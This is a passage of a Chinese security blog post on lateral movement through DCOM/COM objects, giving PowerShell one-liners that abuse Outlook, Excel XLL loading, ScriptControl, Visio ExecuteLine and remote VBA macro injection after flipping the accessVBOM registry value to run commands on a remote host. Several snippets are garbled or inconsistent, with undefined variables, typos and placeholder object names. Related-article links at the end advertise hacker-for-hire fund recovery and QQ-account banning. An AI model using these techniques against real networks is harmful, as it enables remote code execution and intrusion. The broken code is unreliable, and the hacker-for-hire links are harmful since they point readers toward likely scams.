横向移动:使用COM对象进行横向移动的一些探讨
注意:
目标主机中安装有Visio才能成功利用。
6.Outlook
在Outlook对象允许实例化和任意COM相互作用通过“创建对象”对象 *** 。这使攻击者可以与远程计算机上的COM对象进行交互,这些对象通常不会由DCOM公开。
创建Outlook对象的实例
$a=[activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.APPLICATION","10.10.10.10")) 可以通过通过Outlook创建Shell.Application对象来实现命令行执行:
$a=[activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.APPLICATION","10.10.10.10")) .createObject("Shell.Application")
$a.shellExecute(calc.exe)该命令作为Outlook的直接子进程运行。
注意-可以将“ Shell.Application”(已加载的shell32.dll中实现)对象替换为“ Wscript.Shell”.
7.Excel XLL (Excel进程加载恶意的DLL)
XLL库可以扩展Excel,XLL库只是导出特定功能的DLL。Excel.Application对象通过RegisterXLL *** 利用此功能。
$a=?[activator]::CreateInstance([type]::GetTypeFromProgID("Excel.APPLICATION","10.10.10.10")) .RegisterXLL("我们的恶意DLL路径")8.任意脚本执行
通过CreateObject和ScriptControl执行OutlookScript
使用Outlook访问ScriptControl COM类,我们可以利用该字符串运行以字符串格式提供的脚本:
$a=[activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.APPLICATION","10.10.10.10")) .CreateObject("b")
$b.language="VBScript"
$b.AddCode('CreateObject("Wcript.Shell").Exec("Calc.exe")')ScriptControl对象是在msscript.ocx中实现的,很少使用,并且合法地加载此对象的Outlook实例是极为罕见的现象。此外,我们可以将加载jscript.dll或vbscript.dll来运行脚本本身。
限制-ScriptControl对象仅在32位版本中可用。由于64位进程无法加载32位inproc对象,因此64位Outlook无法与该对象进行交互。
Visio对象提供了一种直接 *** ,可以使用“ ExecuteLine” *** 从字符串运行VBA的任何代码:
$a=[activator]::CreateInstance([type]::GetTypeFromProgID("a.invisibleapp","10.10.10.10"))
$b=$a.documents.Add("")
$b.Executeline('CreateObject("wscript.Shell").exec("calc.exe")')VBE7.dll和ScrRun.dll已加载到Visio进程中
注意-ExecuteLine *** 仅允许执行一行代码。通过使用冒号(:)符号将语句分隔在一行上,可以绕过此操作。
9.OFFICE无文件宏执行
Office中的VBA引擎模型通常是无法通过编程实现的,需要通过每个应用程序的属性菜单中的“对Visual Basic项目的信任访问”选项来启用。
也可以通过注册表中每个相关Office应用程序HKCU\Software\Microsoft\Office\<office version>\<office application name>\Security\accessVBOM的值来完成此操作。将这些值远程设置为1(例如,通过WMI)可以将VBA宏注入并执行到Excel,Word,PowerPoint和Access中,而无需首先提供带有文档文件的有效负载。
我们使用的宏来运行calc.exe:
下面是我们的宏代码
$a='Sub Execute()'
CreateObject("Wscript.Shell").Exec("calc.exe")
End Sub
Sub AutoOpen()
Excute
end Sub'通过Excel执行:
$b=[activator]::CreateInstance([type]::GetTypeFromProgID("Excel.application"))
$c=$b.Workbooks.Add("")
$c.VBProject.VBComponents(1).codeModule.ADDFromString($a) //注意:这里加载我们上面的宏代码
$b.run("Book1!ThisWorkbook.Execute")
$b.Quit()通过Word执行:
相关文章
最厉害黑客追款联系方式(正规黑客联系追款)
本文目录一览: 1、黑客是真的假的,会帮你追回被骗的钱吗? 2、黑客追钱可信吗, 3、有没有追款的,真的追回付款,钱到帐后付款的,追回之间不交钱的,反正追回之后付款的,骗子勿扰,特别急 4...
曾厝垵怎么读?
曾厝垵怎么读?曾厝垵是在什么地方?曾厝垵有什么地方特色?很多人在生活、学习中遇到“曾厝垵”这个词,大家都不知道怎么读这三个生僻字。你想知道这些有趣的生僻字怎么读吗?豪友网专门精心整理了生僻字怎么读相关...
黑客攻击地点(黑客攻击路线)
本文导读目录: 1、在互联网上,警察根据什么可以查到黑客犯罪地点 2、一般黑客攻击电脑要IP地址,一般是哪个IP地址啊?内网的还是外网的?上面个还是下面个? 3、如何攻击他人ip地址? 4...
女兵黑客技术视频(黑客工作视频)
本文导读目录: 1、求女主文。女主是黑客很厉害类似重生黑客特种兵那样的文。 2、有一部片子是讲几个陆战队员的美剧,里边女兵是短金发有一集好像是开个直升飞机,长官是白发老头 3、轰动的网络的黑客...
如何找黑客封QQ号,网站防黑客攻击
一、如何封QQ号怎么找黑客 1、接单黑客如果病毒是顽固的,只有最后一个枣形磁盘重新格式下,所有的病毒都会消失,但是没有办法用病毒消除这些信息。如何封QQ号学校被同样,你必须建立对你自己的学习能力的信心...
盾山的新皮肤叫什么 王者荣耀4月28日微信谜底分享
腾讯王者荣耀盾山将要公布限制皮肤,它是五五开黑街的免费皮肤,要是大伙儿报名加入五五开黑节的主题流动,搜集游戏道具,就可以完全免费换取这款肌肤,那麼盾山的限制皮肤叫什么名字呢?它是腾讯王者荣耀手机微信今...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!